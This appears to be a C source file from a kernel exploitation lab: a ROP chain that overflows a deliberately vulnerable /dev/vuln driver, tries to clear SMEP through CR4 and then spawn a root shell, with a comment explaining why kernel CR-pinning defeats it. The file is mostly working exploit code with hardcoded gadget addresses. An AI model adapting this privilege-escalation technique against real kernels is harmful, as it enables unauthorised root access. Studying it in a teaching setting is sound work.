#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

/*
 * This is just a porting of k5.2-2 to the 5.9 kernel used in exercise 3.
 * There apparently is a very convenient ROP gadget that loads CR4 from RDI
 * and then unconditionally jumps to a ret (the gadget is not found by ropper,
 * but it can be easily seen with 'objdump -d'). If we try this exploit, though,
 * we find out that the kernel somehow detects that we are trying to disable
 * SMEP and forcibly enables it again.
 *
 * This is due to the CR-pinning feature added in 5.3. The ROP gadged that we
 * had found is actually patched at runtime and the unconditional jump is
 * turned into a NOP. The code that follows the NOP set the SMEP, SMAP and UMIP
 * flags to their indended values and prints a warning if they were set to
 * something different (see the native_write_cr4() function in the kernel
 * sources for details, and read the 
 *
 *  873d50d58f67ef15d2777b5e7f7a5268bb1fbae2
 *
 * commit in the git log.)
 */

extern void asm_exploit(void);
extern void get_regs(void);

unsigned long user_cs;
unsigned long user_ss;
unsigned long user_flags;
#define USTACKSZ 1024
unsigned char __attribute__((aligned(16))) user_stack[USTACKSZ];
unsigned char *user_stack_end = user_stack + USTACKSZ - sizeof(unsigned long);

#define OFFSET (5*8+16)
#define PAYLOAD_LINES 4

#define PAYLOADSZ (OFFSET + PAYLOAD_LINES * sizeof(unsigned long))
char payload[PAYLOADSZ];

int main()
{
	int fd;
	int i;
	char *p;
	unsigned long *rop;

	get_regs();

	for (p = payload; p < payload + OFFSET; p++) {
		*p = 'A';
	}
	rop = (unsigned long *)p;
	*rop++ = 0xffffffff81001c3a; // pop rdi
	*rop++ = 0x00000000004406f0; // new cr4 with SMEP disabled
	*rop++ = 0xffffffff8102dad2; // load cr4
	*rop++ = (unsigned long)&asm_exploit;

	fd = open("/dev/vuln", O_WRONLY);
	if (fd < 0) {
		perror("/dev/vuln");
		exit(1);
	}

	(void)write(fd, payload, PAYLOADSZ);
	printf("If you see this the offset is probably wrong\n");
	exit(1);
}

void cont()
{
	system("/bin/sh");
	_exit(0);
}
